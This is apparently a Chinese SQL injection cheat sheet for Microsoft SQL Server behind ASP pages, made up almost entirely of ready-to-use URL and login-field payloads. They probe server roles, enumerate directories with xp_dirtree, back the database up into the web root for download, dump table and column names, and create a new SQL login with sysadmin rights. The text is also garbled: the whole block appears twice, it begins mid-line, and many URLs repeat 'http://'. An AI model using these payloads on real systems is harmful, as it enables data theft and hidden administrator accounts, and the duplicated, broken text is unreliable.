非常经典的Ms Sql注射资料
.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''securityadmin''));--
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''diskadmin''));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(''db_owner''));--
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''c:\''-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(''@Inetpub''))-
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''e:\web''--
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
把数据库备份到网页目录:下载
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk=''e:\web\down.bak'';--
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(''USER_LOGIN''),1)%20from%20sysobjects) 参看相关表。
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)
如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:
a、在用户名位置输入【admin'';exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户
b、在用户名位置输入【admin'';exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456
c、在用户名位置输入【admin'';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限
语句6:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''diskadmin''));--
语句7:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句8:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_SRVROLEMEMBER(''bulkadmin''));--
语句9:http://www.xxxxx.com/down/list.asp?id=1 and 1=(select IS_MEMBER(''db_owner''));--
把路径写到表中去:
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(100), id int)-
http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''c:\''-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs)-
http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where paths not in(''@Inetpub''))-
语句:http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1(paths varchar(100), id int)--
语句:http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ''e:\web''--
语句:http://http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs1)-
把数据库备份到网页目录:下载
http://http://www.xxxxx.com/down/list.asp?id=1;declare @a sysname; set @a=db_name();backup database @a to disk=''e:\web\down.bak'';--
and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc)
and%201=(select%20Top%201%20col_name(object_id(''USER_LOGIN''),1)%20from%20sysobjects) 参看相关表。
and 1=(select%20user_id%20from%20USER_LOGIN)
and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1)
如果可以通过连接符注释掉后面的验证,那么就更有意思了,来看我们能作什么:
a、在用户名位置输入【admin'';exec master.dbo.sp_addlogin Cool;--】,添加一个sql用户
b、在用户名位置输入【admin'';exec master.dbo.sp_password null,123456,Cool;--】,给Cool设置密码为123456
c、在用户名位置输入【admin'';exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】,给Cool赋予System Administrator权限